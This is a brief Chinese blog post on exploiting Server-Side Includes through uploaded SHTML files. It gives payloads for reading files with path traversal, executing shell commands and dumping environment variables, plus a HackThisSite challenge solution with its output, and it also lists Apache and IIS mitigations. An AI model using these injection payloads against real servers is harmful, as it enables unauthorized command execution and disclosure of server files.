SHTML的利用

SHTML用的是SSI指令

关于SSI指令:http://httpd.apache.org/docs/2.4/howto/ssi.html

在PHP禁止了命令执行函数,开了安全模式和服务器可以上传SHTML文件的时候可以试试看

当然服务器要允许SHTML的执行

<!--#include file="/home/www/user6987/nav_foot.htm"--> //可以用来读文件

<!--#include virtual="/includes/header.html" --> //这个支持../来切换目录来读取文件

<!--#exec cgi="/cgi-bin/gb.cgi"-->//将会执行CGI程序gb.cgi

<!--#exec cmd="ifconfig"--> //可以用来执行命令

<!--#printenv--> //显示当前存在于web系统中的所有环境变量

<!--#echo var="DOCUMENT_URI" --> //显示当前文档的虚拟路径

 

禁止方法:
.Apache,将access.conf中的"Options Includes ExecCGI"这行代码删除;
.在IIS中,要禁用 #exec 命令,可修改 SSIExecDisable 元数据库;
 
 
在HackThisSite中也有道题目是考察SSI指令的。
Basic8:
<!-- #exec cmd="ls ../" -->

#output
#Hi, au12ha39vc.php index.php level8.php tmp!
#Your name contains 39 characters.

 

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。